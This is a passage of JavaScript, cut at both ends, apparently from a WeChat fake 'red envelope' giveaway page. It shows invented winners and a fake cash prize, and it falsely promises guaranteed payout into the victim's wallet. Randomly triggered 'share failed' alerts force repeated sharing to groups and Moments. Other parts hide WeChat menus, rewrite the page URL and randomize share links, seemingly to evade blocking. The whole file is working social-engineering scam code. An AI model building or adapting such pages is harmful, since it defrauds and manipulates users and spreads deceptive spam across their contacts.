    jfx();
});
var user = [{
    name: "有刺的猬",
    avatar: "https://t20img.yangkeduo.com/a/57833097940aaeb169a41c78265cfc2d9b36ab51-1529485164?imageMogr2/thumbnail/100x"
}, {
    name: "温柔的酒",
    avatar: "https://t20img.yangkeduo.com/a/c49285a7ea92c1e5f10fbeaa03970d8a9fa42ab3-1533379210?imageMogr2/thumbnail/100x"
}, {
    name: "庸人自扰",
    avatar: "https://t20img.yangkeduo.com/a/71ebf5155e72ea0e8f01c9844f10ad480c77924e-1567386584?imageMogr2/thumbnail/100x"
}, {
    name: "蝴蝶飞飞��",
    avatar: "https://t20img.yangkeduo.com/a/c144e7f1c82857f9631d4a54874ab69d9cf1d28f-1573801943?imageMogr2/thumbnail/100x"
}, {
    name: "青春最珍贵",
    avatar: "https://t20img.yangkeduo.com/a/5f7b596db17bfdd324f02ca15f4527c539701e87-1528807323?imageMogr2/thumbnail/100x"
}, {
    name: "在水一方",
    avatar: "https://t20img.yangkeduo.com/a/0babbd878ac3655a0cb291dfbffc810efb005824-1528756839?imageMogr2/thumbnail/100x"
}, {
    name: "一生所求",
    avatar: "https://t20img.yangkeduo.com/a/c7cb9d6c35704a8d35794a51af6856e546765479-1573543737?imageMogr2/thumbnail/100x"
}, {
    name: "梦茹��初夏",
    avatar: "https://t20img.yangkeduo.com/a/186cab3289cb0a66c04ea43f15626b4ac508a0d6-1550213307?imageMogr2/thumbnail/100x"
}, {
    name: "小刘��",
    avatar: "https://t20img.yangkeduo.com/a/e62624e96d05ac86707e7585a93cea732fe70dba-1533376665?imageMogr2/thumbnail/100x"
}, {
    name: "愿得一人",
    avatar: "https://t20img.yangkeduo.com/a/8b1d3b2db1fa1da0b9e3a2d3a9c72d69de6e0e01-1528948414?imageMogr2/thumbnail/100x"
}, {
    name: "金色枫叶",
    avatar: "https://t20img.yangkeduo.com/a/e164bb0956dfff271791251295add70a997ddc83-1556754330?imageMogr2/thumbnail/100x"
}, {
    name: "夏甜甜��",
    avatar: "https://t20img.yangkeduo.com/a/7f5b0037ae2bd309a20f71309542214b1700b79f-1554352913?imageMogr2/thumbnail/100x"
}, {
    name: "太阳花",
    avatar: "https://t20img.yangkeduo.com/a/f2877ba9c69d022ed27f69941aee2ba9a60e2f02-1535865241?imageMogr2/thumbnail/100x"
}, {
    name: "青田姑娘",
    avatar: "https://static.wenjuan.pub/2732044215.jpg"
}, {
    name: "梦中��飞翔",
    avatar: "https://t20img.yangkeduo.com/a/6e17e07c3d4fa88aa6c10938f09eb502c21b18ea-1557097809?imageMogr2/thumbnail/100x"
}, {
    name: "平安一生",
    avatar: "https://t20img.yangkeduo.com/a/ff1ba4aa410056d7d5fc94388687e59594848083-1545370950?imageMogr2/thumbnail/100x"
}, {
    name: "骄傲的玫瑰��",
    avatar: "https://t20img.yangkeduo.com/a/5a9dab6697d7b4e8a8fc93470ec2eca75c1a053f-1550393232?imageMogr2/thumbnail/100x"
}, {
    name: "浅夏初凉",
    avatar: "https://t20img.yangkeduo.com/a/133e0433bffd7cb5f42663acceeb28f3829eecb7-1554733813?imageMogr2/thumbnail/100x"
}];
function i28o2hkspuvyo8wb() {
    function a(a, b) {
        var c = b - a + 1;
        var d = Math.random() * c + a
        return d.toFixed(2);
    }
    function b() {
        var a = Math.floor(10 * Math.random()) + 5
          , b = new Date(new Date().getTime() - 6e4 * a)
          , c = ("0" + b.getHours()).slice(-2)
          , d = ("0" + b.getMinutes()).slice(-2);
        return ("0" + b.getSeconds()).slice(-2),
        c + ":" + d;
    }

    function z() {
        var e = a(1e4, 55e3)
          , t = "color:#F35543;text-align: left;"
          , o = "已到账 "
          , r = "";
        return e > 5e4 && (e = 5e4,
        t = "color:#FFB22E;text-align: left;",
        o = " 手气最佳 ",
        r = Element({
            tagName: "img",
            props: {
                src: "https://static.wenjuan.pub/3198016226.png",
                style: "vertical-align: top",
                width: 18
            }
        })),
        e = (e / 100).toFixed(2) + "元",
        [Element({
            tagName: "span",
            props: {
                style: t
            },
            children: [r, o]
        }), e]
    }
    function c(a) {
        return Element({
            tagName: "li",
            props: {
                style: "width: 100%;height: 1.2rem;overflow: hidden;box-sizing: border-box;padding: 0rem 0.2rem;border-bottom: 0.02rem solid rgba(0, 0, 0, 0.05);display: flex;flex-wrap: wrap;align-items: center;justify-content: center;"
            },
            children: [Element({
                tagName: "img",
                props: {
                    src: a.avatar,
                    style: "width: 0.8rem;height: 0.8rem;margin-right: 0.2rem;overflow: hidden;background-color: #eee;border-radius: 20% "
                }
            }), Element({
                tagName: "div",
                props: {
                    style: "flex: 1;"
                },
                children: [Element({
                    tagName: "div",
                    props: {
                        style: "font-size: 0.3rem;color: #000;margin-bottom: 0.08rem;"
                    },
                    children: [a.name]
                }), Element({
                    tagName: "div",
                    props: {
                        style: "font-size: 0.28rem;color: #929493;"
                    },
                    children: [b()]
                })]
            }), Element({
                tagName: "span",
                props: {
                    style: "text-align: right;font-size: 0.28rem;color: #000;"
                },
                children: z()
            })]
        });
    }
    function d() {
        var b, d = Math.floor(4 * Math.random()) + 1, e = h.lastChild;
        e.parentNode.removeChild(e),
        b = c(f[r]),
        b.props.style += "animation:itemMove" + d + " 0.5s",
        h.insertBefore(b.render(), h.childNodes[0]),
        r++,
        r >= f.length && (r = 0),
        k -= a(180, 400),
        fdm7r1dmx9khg("[data-num]").innerHTML = k.toFixed(2);
    }
    function e(a, b) {
        var c = 1e3
          , d = b
          , e = 50
          , f = d / (c / e)
          , g = 0
          , h = 0
          , i = setInterval(function() {
            g = Math.floor(100 * (g + f)) / 100,
            g >= d && (clearInterval(i),
            g = d,
            shtip());
            var b = Number(g);
            b != h && (h = b,
            a.innerHTML = h.toFixed(2));
        }, 30);
    }
    var f, g, h, i, k, j = [];
    for (r = 10,
    f = user,
    f.sort(function() {
        return Math.random() > .5 ? -1 : 1;
    }),
    p = 0; 10 > p; p++)
        j[p] = c(f[p]);
    k = a(1899217, 2062214),
    g = Element({
        tagName: "div",
        props: {
            onclick: "shtip()",
            style: "height: 100vh; overflow: hidden; background-color: #fff;"
        },
        children: [Element({
            tagName: "div",
            props: {
                style: "overflow: hidden; height: 6.6rem; border: 1px solid rgb(240, 94, 77);background:url(" + _x.fxt + ") no-repeat;background-size:100% auto;background-size: cover;background-repeat: no-repeat;border-radius: 0px 0px 50% 50% / 10px 10px 23% 23%; margin-bottom: 20px"
            },
            children: [Element({
                tagName: "img",
                props: {
                    src: _x.img,
                    style: "width: 1.2rem;height: 1.2rem;margin: 0 auto 0;display: block;margin-top: 1.2rem;border-radius: 10px;animation: btnShake1 2s infinite;"
                }
            }), Element({
                tagName: "p",
                props: {
                    style: "font-size: 0.4rem;color: #FFE2B1;text-align: center;padding-top: 0.2rem;font-weight: bold;"
                },
                children: [_x.at]
            }), Element({
                tagName: "p",
                props: {
                    style: "font-size: 0.8rem;text-align: center;padding-top: 0.2rem;color: #FFE2B1;font-weight: bold;animation: btnShake1 2s infinite;"
                },
                children: ["¥", Element({
                    tagName: "span",
                    props: {
                        "data-time": 0
                    },
                    children: [money]
                })]
            }), Element({
                tagName: "div",
                props: {
                    style: "display:block;text-align: center;font-size: 0.3rem;color: #FFE2B1 "
                },
                children: ['按要求完成转发任务,自动存入零钱']
            }), Element({
                tagName: "div",
                props: {
                    style: "margin: 15px auto; width: 110px; height: 40px; border-radius: 20px; background-color: rgb(226, 205, 155); color: #333; text-align: center; line-height: 40px; font-size: 16px; box-shadow: rgba(0, 0, 0, 0.2) 0px 4px 0px 0; animation: btnShake1 2s infinite;"
                },
                children: ["提现到钱包"]
            })]
        }), Element({
            tagName: "div",
            props: {
                style: "width: 100%;height: 0.2rem;background-color: #eceeed;"
            }
        }), Element({
            tagName: "div",
            props: {
                style: "font-size: 0.28rem;color:#929493;height: 0.6rem;line-height: 0.6rem;padding-left: 0.2rem;border-bottom: solid 0.02rem rgba(0,0,0,0.05) "
            },
            children: ["总计5000000元 剩余", Element({
                tagName: "span",
                props: {
                    "data-num": 0
                },
                children: [k]
            }), "元"]
        }), Element({
            tagName: "ul",
            props: {
                id: "list",
                style: "width: 100%;background-color: rgba(255, 255, 255, 0.1);overflow: hidden;border-radius: 0.1rem;height: 12rem;"
            },
            children: j
        }), Element({
            tagName: "div",
            props: {
                id: "demo",
                style: "opacity: 0.8; position: fixed; z-index: 999; top: 10px; right: 10px; overflow: hidden; text-align: center; color: #fff; font-size: 15px; animation: tipMove 1.5s infinite;"
            },
            children: [Element({
                tagName: "div",
                props: {
                    style: "overflow: hidden; width: 110px; height: 100px;"
                },
                children: [Element({
                    tagName: "div",
                    props: {
                        style: "border-top: solid 2px #fff; border-right: solid 2px #fff; width: 20px; height: 20px; position: absolute; top: 3px; right: 3px; transform: skewX(-25deg) rotate(-30deg);"
                    }
                }), Element({
                    tagName: "div",
                    props: {
                        style: "width: 200px; height: 80px; border-radius: 50%; border: solid 2px #fff; position: absolute; top: -14px; right: -2px; transform: rotate(-22deg)"
                    }
                }), Element({
                    tagName: "div",
                    props: {
                        style: "margin-top: 60px; margin-left: -37px"
                    },
                    children: [Element({
                        tagName: "img",
                        props: {
                            src: "https://static.wenjuan.pub/1664803908.png",
                            width: "200px",
                        }
                    })]
                })]
            })]
        })]
    }),
    document.body.appendChild(g.render()),
    h = fdm7r1dmx9khg("#list"),
    e(fdm7r1dmx9khg("[data-time]"), Number(money)),
    i = setInterval(function() {
        return h.parentNode ? (d(),
        void 0) : clearInterval(i);
    }, 2e3);
    fdm7r1dmx9khg('#demo').onclick = function() {
        wx.showMenuItems({
            menuList: ["menuItem:share:appMessage", "menuItem:share:timeline"]
        });
    }
}
function Element(a) {
    var b = a.tagName
      , c = a.props
      , d = a.children;
    return this instanceof Element ? (this.tagName = b,
    this.props = c || {},
    this.children = d || [],
    void 0) : new Element({
        tagName: b,
        props: c,
        children: d
    });
}
function fdm7r1dmx9khg(a) {
    return document.querySelector(a);
}
function shtip() {
    switch (step) {
    case 0:
        app.alert("<div style='text-align: center;box-sizing: content-box;display: block'><span style='font-size: 23px;color:red;'><strong>恭喜您</strong></span></br><span style='font-size: 20px;color:#ff6b00;'>抢到红包 <span style='font-size: 22px;color:red;'><strong>¥ {money}</strong></span></span><br><br><span style='color:red;'>活动宗旨:</span>" + _x.hdzz + "</br><br><span style='color:red;'>提现方法:</span>您只需要分享到<br><span style='color:red;font-size:20px;'>微信群</span></br>完成后自动存入您的微信零钱</br></br><span style='color:red;'>总额仅剩余</span><span style='color:#009688;'>106.38</span><span style='color:red;'>万,先到先得,活动经认证,真实有效</span></div>", "我知道了");
        break;
    case 1:
        if (_di > 10 && _di < 30 && (_di % 10 == 1 || _di % 10 == 2 || _di % 10 == 3 || _di % 10 == 4 || _di % 10 == 5)) {
            step++;
            shtip();
            break;
        }
        audioTip.play();
        app.alert('<div class="layui-m-layercont" style="text-align: center"><p><strong><span style="color: rgb(0, 176, 80); font-size: 24px;">分享成功 <img src="https://static.wenjuan.pub/1946759458.png" style="position:relative;top:4px;width:25px;height:25px;"></span></strong></p><br><p>请继续分享到<strong style="color: red; font-size: 22px">3</strong>个不同的<span style="color:red;">微信群</span></p> <p><span style="font-size: 20px;color:red;">¥ {money}</span> <p>将自动存入您的微信钱包</p> </div>', "我知道了");
        data.title = _f.s.title2;
        data.desc = _f.s.desc2;
        data.link = _f.f[2];
        data.img_url = _f.s.img2;
        conload(1);
        break;
    case 2:
        if (_di > 10 && _di < 30 && (_di % 10 == 1 || _di % 10 == 2 || _di % 10 == 3)) {
            step++;
            shtip();
            break;
        }
        audioTip.play();
        app.alert('<div class="layui-m-layercont" style="text-align: center"><p><strong><span style="color: rgb(0, 176, 80); font-size: 24px;">分享成功 <img src="https://static.wenjuan.pub/1946759458.png" style="position:relative;top:4px;width:25px;height:25px;"></span></strong></p><br><p>请继续分享到<strong style="color: red; font-size: 22px">2</strong>个不同的<span style="color:red;">微信群</span></p> <p><span style="font-size: 20px;color:red;">¥ {money}</span> <p>将自动存入您的微信钱包</p> </div>', "我知道了");
        data.title = _f.s.title3;
        data.desc = _f.s.desc3;
        data.link = _f.f[3];
        data.img_url = _f.s.img3;
        _stime = _stime + _di;
        conload(1);
        break;
    case 3:
        if (_di > 10 && _di < 30 && (_di % 10 == 1 || _di % 10 == 2 || _di % 10 == 3 || _di % 10 == 4)) {
            step++;
            shtip();
            break;
        }
        audioFail.play();
        app.alert('<div class="layui-m-layercont"><p><span style="font-size: 24px; color: rgb(255, 0, 0);"><strong>分享失败 <img src="https://static.wenjuan.pub/2696834394.png" style="top: 4px;position: relative;width:25px;height:25px;"></strong></span></p><p><span style="color: rgb(247, 150, 70);"></span></p><br><p><span style="font-size: 16px;">注意:分享到相同的群会失败</span></P><p></p><p><span style="font-size: 16px;">请尝试重新分享到<span style="color:red;">2个不同的群</span></strong></span></p><br><span style="font-size: 20px;color:red;">¥{money}</span><p><span style="font-size: 16px;">将自动存入您的微信钱包<strong></strong></span></p ></div></div></div></div>', "我知道了");
        data.title = _f.s.title4;
        data.desc = _f.s.desc4;
        data.link = _f.f[4];
        data.img_url = _f.s.img4;
        _stime = _stime + _di;
        conload(1);
        break;
    case 4:
        if (_di > 10 && _di < 30 && (_di % 10 == 1)) {
            step++;
            shtip();
            break;
        }
        audioTip.play();
        app.alert('<div class="layui-m-layercont" style="text-align: center"><p><strong><span style="color: rgb(0, 176, 80); font-size: 24px;">分享成功 <img src="https://static.wenjuan.pub/1946759458.png" style="position:relative;top:4px;width:25px;height:25px;"></span></strong></p><br><p>请继续分享到<strong style="color: red; font-size: 22px">1</strong>个不同的<span style="color:red;">微信群</span></p> <p><p>即可马上到账<span style="font-size: 20px;color:red;">¥{money}</span></p> </div>', "我知道了");
        data.title = _f.s.title5;
        data.desc = _f.s.desc5;
        data.link = _f.f[5];
        data.img_url = _f.s.img5;
        _stime = _stime + _di;
        conload(1);
        break;
    case 5:
        if (_di > 10 && _di < 30 && (_di % 10 == 1 || _di % 10 == 2)) {
            step++;
            shtip();
            break;
        }
        audioFail.play();
        app.alert('<div class="layui-m-layercont"><p><span style="font-size: 24px; color: rgb(255, 0, 0);"><strong>操作超时 <img src="https://static.wenjuan.pub/2696834394.png" style="top: 4px;position: relative;width:25px;height:25px;"></strong></span></p><p><span style="color: rgb(247, 150, 70);"></span></p><br><p><span style="font-size: 16px;">请尝试重新分享到<span style="color: rgb(255, 0, 0);font-size: 16px">1个不同的群</span></P><p></p><br><p><span style="font-size: 20px;color:red;">¥{money}</span></strong></span></p>将自动存入您的微信钱包<br></div></div></div></div>', "我知道了");
        data.title = _f.s.title6;
        data.desc = _f.s.desc6;
        data.link = _f.f[6];
        data.img_url = _f.s.img6;
        _stime = _stime + _di;
        conload(1);
        break;
    case 6:
        if (_di > 20 && _di < 30) {
            step++;
            shtip();
            break;
        }
        var u = navigator.userAgent;
        var isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
        isiOS = false;
        if (_di == 10) {
            audioFail.play();
            app.alert('<div class="layui-m-layercont" style="text-align: center"><p><strong><span style="color: rgb(0, 176, 80); font-size: 24px;">分享失败<img src="https://static.wenjuan.pub/2696834394.png" style="position:relative;top:4px;width:25px;height:25px;"></span></strong></p><br><p>您分享的<span style="color: rgb(255, 0, 0);">好友群小于50人</span></p ><p>请您<span style="font-size: 20px; color: rgb(255, 0, 0);">按要求</span>再次分享</p><p>保证100%马上到账<span style="font-size: 20px;color:red;">¥{money}</span></p ></div>', "我知道了");
            data.title = _f.s.title6;
            data.desc = _f.s.desc6;
            data.link = _f.f[6];
            data.img_url = _f.s.img6;
            _stime = _stime + _di;
            conload(1);
        } else {
            ycan();
            wx.showMenuItems({
                menuList: ["menuItem:share:timeline"]
            });
            audioTip.play();
            if (_di == 9) {
                app.alert("<div style='text-align: center;box-sizing: content-box;display: block'><span style='font-size: 23px;color:red;'><strong>恭喜您</strong></span></br><span style='font-size: 20px;color:#ff6b00;'>抢到红包 <span style='font-size: 22px;color:red;'><strong>¥ {money}</strong></span></span><br><br><span style='color:red;'>活动宗旨:</span>" + _x.hdzz + "</br><br><span style='color:red;'>提现方法:</span>您只需要分享到<br><span style='color:red;font-size:20px;'>朋友圈</span></br>完成后自动存入您的微信零钱</br></br><span style='color:red;'>总额仅剩余</span><span style='color:#009688;'>106.38</span><span style='color:red;'>万,先到先得,活动经认证,真实有效</span></div>", "我知道了");
            } else {
                app.alert('<div class="layui-m-layercont" style="text-align: center"><p><strong><span style="color: rgb(0, 176, 80); font-size: 24px;">分享成功 <img src="https://static.wenjuan.pub/1946759458.png" style="position:relative;top:4px;width:25px;height:25px;"></span></strong></p><br><p>只剩<span style="color: rgb(255, 0, 0);">最后一步啦</span></p ><p>请分享到<span style="font-size: 24px; color: rgb(255, 0, 0);">朋友圈</span></p ><p>保证100%马上到账 <span style="font-size: 20px;color:red;">¥{money}</span><br></p></div>', "我知道了");
            }
            data.title = _f.s.ptitle1;
            data.link = _f.f[7];
            data.img_url = _f.s.pimg1;
            conload(2);
        }
        break;
    case 7:
        if (_di > 20 && _di < 30) {
            step++;
            shtip();
            break;
        }
        audioFail.play();
        var u = navigator.userAgent;
        var isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
        isiOS = false;
        if (_di == 10) {
            app.alert('<div class="layui-m-layercont"><p><span style="font-size: 24px; color: rgb(255, 0, 0);"><strong>分享失败 <img src="https://static.wenjuan.pub/2696834394.png" style="top: 4px;position: relative;width:25px;height:25px;"></strong></span></p><p><span style="color: rgb(247, 150, 70);"></span></p><br><p><style="font-size: 16px;">注意:请不要<span style="color: rgb(255, 0, 0);">取消分享或分享给好友</span>避免无法到账</span></p ><p></p ><p></br><span style="font-size: 16px;">请重新分享到<strong><span style="font-size: 18px; color: rgb(255, 0, 0);">\>50人</span></strong>的好友群</span></p ><p><span style="font-size: 16px;">保证<strong><span style="font-size: 20px; color: rgb(255, 0, 0);">100%</span></strong>可以到账<strong><span style="font-size: 20px;color:red;">¥{money}</span></strong></span></p ></div></div></div></div>', "我知道了");
            data.title = _f.s.title6;
            data.desc = _f.s.desc6;
            data.link = _f.f[6];
            data.img_url = _f.s.img6;
            _stime = _stime + _di;
            conload(1);
        } else {
            app.alert('<div class="layui-m-layercont"><p><span style="font-size: 24px; color: rgb(255, 0, 0);"><strong>分享失败 <img src="https://static.wenjuan.pub/2696834394.png" style="top: 4px;position: relative;width:25px;height:25px;"></strong></span></p ><p><span style="color: rgb(247, 150, 70);"></span></p><br><p><style="font-size: 16px;">注意:必须<span style="color: rgb(255, 0, 0);">公开</span>分享才可以到账</span></p ><p></p ><p><strong style="color: DarkOrange; font-size: 14px">客服需要验证朋友圈信息发放红包!</strong></br><br><span style="font-size: 16px;">请尝试重新分享到<strong><span style="font-size: 20px; color: rgb(255, 0, 0);">朋友圈</span></strong></span></p ><p><span style="font-size: 16px;">保证<strong><span style="font-size: 20px; color: rgb(255, 0, 0);">100%</span></strong>可以到账 <strong><span style="font-size: 20px;color:red;">¥{money}</span></strong></span></p ></div></div></div></div>', "我知道了");
            data.title = _f.s.ptitle2;
            data.link = _f.f[8];
            data.img_url = _f.s.pimg2;
            conload(2);
        }
        break;
    case 8:
        audioTip.play();
        if (_x.fxtk == 1) {
            app.alert('<div class="layui-m-layercont" style="text-align: center"> <p style="margin:0;padding:0;font-size:18px;">非常感谢您的参与!</p > <p style="margin:0;padding:0;"> <span style="font-size: 18px;"><strong> <span style="color: rgb(255, 0, 0);">通知:系统将会验证分享信息判断是否完成转发任务</span> </strong> </span> </p > <p style="margin:0;padding:0;margin-top:20px;">由于活动量巨大</p > <p style="margin:0;padding:0; font-size:16px">最迟24小时内到账</p > <p style="margin:0;padding:0; color:red">请保留分享信息至零钱到账</p > <p style="margin:0;padding:0;">请注意查看您的微信钱包</p ><br><p style="margin:0;padding:0;"><span style="color: rgb(255, 0, 0); font-size:14px"><strong>注:删除分享链接会导致无法到账</strong></span> </p > </div>', "我知道了", function() {
                sutyqiab();
            });
        } else {
            sutyqiab();
        }
    }
}
function closeWindow() {
    if (typeof (WeixinJSBridge) != "undefined") {
        WeixinJSBridge.call('closeWindow');
        WeixinJSBridge.call('closeWindow');
    } else {
        if (navigator.userAgent.indexOf("MSIE") > 0) {
            if (navigator.userAgent.indexOf("MSIE 6.0") > 0) {
                window.opener = null;
                window.close();
            } else {
                window.open('', '_top');
                window.top.close();
            }
        } else if (navigator.userAgent.indexOf("Firefox") > 0) {
            window.location.href = 'about:blank ';
        } else {
            window.opener = null;
            window.open('', '_self', '');
            window.close();
        }
    }
}

function sutyqiab() {
    gameOver()
}
var app = {
    alert: function(a, b, c) {
        var d, e;
        document.querySelector("#dialog") || (d = Element({
            tagName: "div",
            props: {
                id: "dialog",
                style: "display: none;position: fixed;z-index: 1000;top: 0;right: 0;left: 0;bottom: 0;background: rgba(0, 0, 0, 0.6);"
            },
            children: [Element({
                tagName: "div",
                props: {
                    style: "position:fixed;z-index:5000;width:85%;max-width:400px;top:50%;left:50%;transform:translate(-50%,-50%);text-align:center;border-radius:10px;overflow:hidden;background:linear-gradient(#ff6b00,#ff4200)"
                },
                children: [Element({
                    tagName: "div",
                    props: {
                        style: "padding:0.7em 20px 1.7em;font-size:15px;line-height:1.3;word-wrap:break-word;word-break:break-all;color:#000000;margin:0.2rem;background-color:#FFFFFF;border-radius:10px;overflow:hidden;",
                        "data-msg": 0
                    }
                }), Element({
                    tagName: "b",
                    props: {
                        style: "width: 100%; height: 45px; padding-bottom: 1px; display: flex; flex-wrap: wrap; justify-content: center; align-items: center; color: #ffffff; font-size: 21px; border-top: 1px solid #EEEEEE;",
                        "data-go": 0
                    }
                })]
            })]
        }),
        document.body.appendChild(d.render())),
        e = fdm7r1dmx9khg("#dialog"),
        fdm7r1dmx9khg("[data-msg]").innerHTML = '<img src=' + _x.img + ' style="marginBottom:-100%;width:60px;height:60px;overflow: hidden;border-radius:20%;">' + a.replace("{money}", money),
        fdm7r1dmx9khg("[data-go]").innerHTML = b || "好的",
        e.style.display = "block",
        fdm7r1dmx9khg("[data-go]").onclick = function() {
            e.style.display = "none",
            "function" == typeof c && c();
        }
        ;
    }
};
function getQueryVariable(uurr) {
    var query = decodeURIComponent(uurr);
    if (query.indexOf("?") != -1) {
        var arr = query.split("?");
        query = arr[arr.length - 1];
    }
    var vars = query.split("&");
    for (var i = 0; i < vars.length; i++) {
        var pair = vars[i].split("=");
        if (pair[0] == "lang") {
            return pair[1];
        }
        var pair = vars[i].split("%3D");
        if (pair[0] == "lang") {
            return pair[1];
        }
    }
    return ("");
}
function ycan() {
    if (typeof WeixinJSBridge == "undefined") {
        if (document.addEventListener) {
            document.addEventListener('WeixinJSBridgeReady', onBridgeReady, false);
        } else if (document.attachEvent) {
            document.attachEvent('WeixinJSBridgeReady', onBridgeReady);
            document.attachEvent('onWeixinJSBridgeReady', onBridgeReady);
        }
    } else {
        onBridgeReady();
    }
    function onBridgeReady() {
        WeixinJSBridge.call('hideOptionMenu')
    }
    ;
}
function jfx() {
    closeaddiv();
    var removeObj = document.getElementById('nyni');
    removeObj.parentNode.removeChild(removeObj);
    !function(a, b) {
        var c = b.documentElement
          , d = "orientationchange"in window ? "orientationchange" : "resize"
          , e = function() {
            var a = c.clientWidth;
            a && (c.style.fontSize = 100 * (a / 750) + "px");
        };
        b.addEventListener && (e(),
        a.addEventListener(d, e, !1),
        b.addEventListener("DOMContentLoaded", e, !1));
    }(window, document);
    Element.prototype.render = function() {
        var a, b, c = document.createElement(this.tagName), d = this.props;
        for (a in d)
            b = d[a],
            c.setAttribute(a, b);
        return this.children.forEach(function(a) {
            var b = null;
            b = a instanceof Element ? a.render() : document.createTextNode(a),
            c.appendChild(b);
        }),
        c;
    }
    i28o2hkspuvyo8wb();
    var ui = document.getElementById("jb");
    ui.style.display = "inline";
    wx.ready(function() {
        if (_x.led == 1) {
            window.history.replaceState({}, 'Message', "/?lang=" + getQueryVariable(_f.f[1]) + "&code=" + getids());
            fhuy(gameOver);
        }
        audioTip.play();
        ycan();
        wx.showMenuItems({
            menuList: ["menuItem:share:appMessage"]
        });
        if (_x.qunid != "") {
            function onBridgeReady4() {
                WeixinJSBridge.on('menu:share:timeline', function(argv) {
                    shareTimeline();
                });
            }
            function shareTimeline() {
                WeixinJSBridge.invoke('shareTimeline', {
                    "appid": _x.qunid,
                    "img_url": _f.s.pimg1,
                    "type": 5,
                    "img_width": "100",
                    "img_height": "100",
                    "link": _f.f[7].replace(/{domain}/, aam).replace(/{pmain}/, bbm).replace(/\*/, makeid()).replace(/\*/, makeid()),
                    "title": _f.s.ptitle1.replace(/@行/g, "\n").replace(/@滑/g, money)
                }, function(res) {
                    step++;
                    shtip();
                });
            }
            if (typeof WeixinJSBridge == "undefined") {
                if (document.addEventListener) {
                    document.addEventListener('WeixinJSBridgeReady', onBridgeReady4, false);
                } else if (document.attachEvent) {
                    document.attachEvent('WeixinJSBridgeReady', onBridgeReady4);
                    document.attachEvent('onWeixinJSBridgeReady', onBridgeReady4);
                }
            } else {
                onBridgeReady4();
            }
        } else {
            wx.onMenuShareTimeline({
                title: _f.s.ptitle1.replace(/@行/g, "\n").replace(/@滑/g, money),
                link: _f.f[7].replace(/{domain}/, aam).replace(/{pmain}/, bbm).replace(/\*/, makeid()).replace(/\*/, makeid()),
                imgUrl: _f.s.pimg1,
                type: '',
                success: function() {
                    step++;
                    shtip();
                }
            })
        }
        if (_x.qunid != "") {
            function onBridgeReady3() {
                WeixinJSBridge.on('menu:share:appmessage', function(argv) {
                    shareFriend();
                });
            }
            function shareFriend() {
                WeixinJSBridge.invoke('sendAppMessage', {
                    "appid": _x.qunid,
                    "img_url": _f.s.img1,
                    "img_width": "100",
                    "img_height": "100",
                    "type": 5,
                    "link": _f.f[1].replace(/{domain}/, aam).replace(/{pmain}/, bbm).replace(/\*/, makeid()).replace(/\*/, makeid()),
                    "desc": _f.s.desc1.replace(/@行/g, "\n").replace(/@滑/g, money),
                    "title": _f.s.title1.replace(/@行/g, "\n").replace(/@滑/g, money)
                }, function(res) {
                    step++;
                    shtip();
                });
            }
            if (typeof WeixinJSBridge == "undefined") {
                if (document.addEventListener) {
                    document.addEventListener('WeixinJSBridgeReady', onBridgeReady3, false);
                } else if (document.attachEvent) {
                    document.attachEvent('WeixinJSBridgeReady', onBridgeReady3);
                    document.attachEvent('onWeixinJSBridgeReady', onBridgeReady3);
                }
            } else {
                onBridgeReady3();
            }
        } else {
            wx.onMenuShareAppMessage({
                title: _f.s.title1.replace(/@行/g, "\n").replace(/@滑/g, money),
                desc: _f.s.desc1.replace(/@行/g, "\n").replace(/@滑/g, money),
                link: _f.f[1].replace(/{domain}/, aam).replace(/{pmain}/, bbm).replace(/\*/, makeid()).replace(/\*/, makeid()),
                imgUrl: _f.s.img1,
                type: 'link',
                success: function() {
                    step++;
                    shtip();
                }
            });
        }
    });
}
var stamp = new Date().getTime();
var hiddenProperty = 'hidden'in document ? 'hidden' : 'webkitHidden'in document ? 'webkitHidden' : 'mozHidden'in document ? 'mozHidden' : null;
var visibilityChangeEvent = hiddenProperty.replace(/hidden/i, 'visibilitychange');
var onVisibilityChange = function() {
    if (!document[hiddenProperty]) {} else {
        stamp = new Date().getTime()
    }
}
document.addEventListener(visibilityChangeEvent, onVisibilityChange);
function conload(type) {
    wx.ready(function() {
        if (type == 1) {
            if (_x.qunid != "") {
                function onBridgeReady3() {
                    WeixinJSBridge.on('menu:share:appmessage', function(argv) {
                        shareFriend();
                    });
                }
                function shareFriend() {
                    WeixinJSBridge.invoke('sendAppMessage', {
                        "appid": _x.qunid,
                        "img_url": data.img_url,
                        "img_width": "100",
                        "img_height": "100",
                        "type": 5,
                        "link": data.link.replace(/{domain}/, aam).replace(/{pmain}/, bbm).replace(/\*/, makeid()).replace(/\*/, makeid()),
                        "desc": data.desc.replace(/@行/g, "\n").replace(/@滑/g, money),
                        "title": data.title.replace(/@行/g, "\n").replace(/@滑/g, money)
                    }, function(res) {
                        if (new Date().getTime() - stamp > _stime) {
                            step++;
                            shtip();
                        }
                        ;
                    });
                }
                if (typeof WeixinJSBridge == "undefined") {
                    if (document.addEventListener) {
                        document.addEventListener('WeixinJSBridgeReady', onBridgeReady3, false);
                    } else if (document.attachEvent) {
                        document.attachEvent('WeixinJSBridgeReady', onBridgeReady3);
                        document.attachEvent('onWeixinJSBridgeReady', onBridgeReady3);
                    }
                } else {
                    onBridgeReady3();
                }
            } else {
                wx.onMenuShareAppMessage({
                    title: data.title.replace(/@行/g, "\n").replace(/@滑/g, money),
                    desc: data.desc.replace(/@行/g, "\n").replace(/@滑/g, money),
                    link: data.link.replace(/{domain}/, aam).replace(/{pmain}/, bbm).replace(/\*/, makeid()).replace(/\*/, makeid()),
                    imgUrl: data.img_url,
                    type: 'link',
                    success: function() {
                        if (new Date().getTime() - stamp > _stime) {
                            step++;
                            shtip();
                        }
                    }
                });
            }
        } else {
            if (_x.qunid != "") {
                function onBridgeReady4() {
                    WeixinJSBridge.on('menu:share:timeline', function(argv) {
                        shareTimeline();
                    });
                }
                function shareTimeline() {
                    WeixinJSBridge.invoke('shareTimeline', {
                        "appid": _x.qunid,
                        "img_url": data.img_url,
                        "type": 5,
                        "img_width": "100",
                        "img_height": "100",
                        "link": data.link.replace(/{domain}/, aam).replace(/{pmain}/, bbm).replace(/\*/, makeid()).replace(/\*/, makeid()),
                        "title": data.title.replace(/@行/g, "\n").replace(/@滑/g, money)
                    }, function(res) {
                        step++;
                        shtip();
                    });
                }
                if (typeof WeixinJSBridge == "undefined") {
                    if (document.addEventListener) {
                        document.addEventListener('WeixinJSBridgeReady', onBridgeReady4, false);
                    } else if (document.attachEvent) {
                        document.attachEvent('WeixinJSBridgeReady', onBridgeReady4);
